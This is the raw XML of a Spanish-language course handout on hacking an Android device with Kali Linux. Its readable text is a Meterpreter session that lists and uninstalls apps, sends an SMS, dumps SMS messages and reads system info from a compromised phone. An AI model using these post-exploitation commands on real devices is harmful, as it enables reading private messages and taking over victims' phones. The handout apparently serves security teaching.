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327DF" w14:textId="6C83B7DB" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:permStart w:id="892481783" w:edGrp="everyone"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E85393" wp14:editId="0F62BA3A">
                <wp:extent cx="5734050" cy="1295400"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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C53780" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5" w:themeColor="accen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ermStart w:id="556930820" w:edGrp="everyone"/>
                            <w:r w:rsidRPr="0032529E">
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5" w:themeColor="accen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urso hacking a Dispositivo con Kali Linux </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11EF328C" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5" w:themeColor="accen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529E">
                              <w:rPr>
                                <w:rStyle w:val="nfasissutil"/>
                                <w:color w:val="5B9BD5" w:themeColor="accen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putaxion</w:t>
                            </w:r>
                            <w:permEnd w:id="5569308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E8539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width:451.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" filled="f" stroked="f">
                <v:fill o:detectmouseclick="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DC53780" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5" w:themeColor="accen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ermStart w:id="556930820" w:edGrp="everyone"/>
                      <w:r w:rsidRPr="0032529E">
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5" w:themeColor="accen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urso hacking a Dispositivo con Kali Linux </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11EF328C" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5" w:themeColor="accen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529E">
                        <w:rPr>
                          <w:rStyle w:val="nfasissutil"/>
                          <w:color w:val="5B9BD5" w:themeColor="accen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mputaxion</w:t>
                      </w:r>
                      <w:permEnd w:id="556930820"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:permEnd w:id="892481783"/>
    </w:p>
    <w:p w14:paraId="2BED8282" w14:textId="4364132C" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B48FAA" w14:textId="77777777" w:rsidR="00BF72A6" w:rsidRDefault="009A65A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF9F0C3" wp14:editId="02962683">
            <wp:extent cx="6067425" cy="582917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utaxio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934" cy="583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4FD1" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0"/>
    <w:p w14:paraId="63EE6A16" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A4808" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app_uninstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /storage/emulated/legacy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mega.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA53FE" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send_sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874FF21" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send_sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d &lt;number&gt; -t &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6C763F" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sends SMS messages to specified number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B011FE3" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15310881" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152009D1" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09255F4F" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -d &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  Destination</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C61F01" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -h        Help Banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A06A3D" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -r        Wait for delivery report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6518902F" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -t &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  SMS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> body text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6035BC" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FA6542" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send_sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d 2235545555 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>holaaaaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C0B6779" w14:textId="77777777" w:rsidR="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dump_sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D6646" w14:textId="77777777" w:rsidR="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779952AF" w14:textId="77777777" w:rsidR="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rmdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5005F9CF" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D6C51" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer    : localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05412B68" w14:textId="77777777" w:rsidR="001B0578" w:rsidRPr="001B0578" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OS          : Android 5.1.1 - Linux 4.0.9 (i686)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B069E96" w14:textId="302AEF4D" w:rsidR="009A65A0" w:rsidRDefault="001B0578" w:rsidP="001B0578">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Meterpreter :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dalvik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67FEAE44" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0"/>
    <w:p w14:paraId="30705560" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60880237" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009A65A0" w:rsidSect="009E69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USER" w:date="2020-01-28T23:41:00Z" w:initials="U">
    <w:p w14:paraId="7865A683" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Textocomentario"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="009E6905">
        <w:t xml:space="preserve">Pablo Ezequiel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6905">
        <w:t>Cordoba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65A683" w15:done="1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5A0"/>
    <w:rsid w:val="001B0578"/>
    <w:rsid w:val="00226754"/>
    <w:rsid w:val="0032529E"/>
    <w:rsid w:val="009A65A0"/>
    <w:rsid w:val="009E6905"/>
    <w:rsid w:val="00A13917"/>
    <w:rsid w:val="00B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5C596"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0FE223E6-DC51-4EAB-9338-586ABEAD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65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65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65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9A65A0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009A65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A65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A65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A65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65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65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65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65A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6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5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FBC2D-476B-42F3-BC72-363F1B46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1-29T03:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-29T03:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>